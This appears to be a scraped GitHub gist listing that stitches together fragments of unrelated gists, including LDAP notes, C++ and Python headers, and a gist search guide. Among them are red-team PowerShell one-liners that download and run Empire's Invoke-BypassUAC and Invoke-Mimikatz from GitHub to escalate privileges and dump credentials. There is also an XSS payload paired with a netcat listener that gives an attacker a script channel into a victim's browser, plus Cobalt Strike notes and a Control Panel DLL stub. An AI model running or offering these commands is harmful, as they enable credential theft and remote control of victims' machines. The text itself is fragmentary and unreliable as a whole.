title | author | date | source | notoc |
---|---|---|---|---|
LDAP Search Filter Cheatsheet |
Jon LaBelle |
January 4, 2021 |
true |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdafx.h" | |
#include <windows.h> | |
#include <Winbase.h> | |
#include <Wtsapi32.h> | |
#include <Userenv.h> | |
#include <malloc.h> | |
#pragma comment(lib, "Wtsapi32.lib") | |
#pragma comment(lib, "Userenv.lib") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
MANUAL COBALT STRIKE | |
!------------------------------------------------- --Standard Commands---------------------------------------------- -----! | |
Creating a load | |
Attacks->Packages-> | |
interact - choose an agent | |
help -> will show a list of commands | |
help [command] will show help for a specific command | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done | |
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)> |
Enter this in the search box along with your search terms:
Get all gists from the user santisbon.
user:santisbon
Find all gists with a .yml extension.
extension:yml
Find all gists with HTML files.
language:html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// dllmain.cpp : Defines the entry point for the DLL application. | |
#include "pch.h" | |
#include <Windows.h> | |
extern "C" __declspec(dllexport) LONG CplApplet() | |
{ | |
MessageBoxA(NULL, "Replace this message box with something more interesting...", "Control Panel", 0); | |
return 1; | |
} |
Signing
simple bind over insecure channel
# ldapsearch -xLLL -H ldap://ad1.win2016.test -b 'DC=win2016,DC=test' -D 'CN=Administrator,CN=Users,DC=win2016,DC=test' -W samaccountname=Administrator DN
Enter LDAP Password:
ldap_bind: Strong(er) authentication required (8)
additional info: 00002028: LdapErr: DSID-0C090256, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v3839
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from __future__ import print_function | |
import pickle | |
import os.path | |
from googleapiclient.discovery import build | |
from google_auth_oauthlib.flow import InstalledAppFlow | |
from google.auth.transport.requests import Request | |
from apiclient import errors | |
import re | |
from bs4 import BeautifulSoup as Soup |
NewerOlder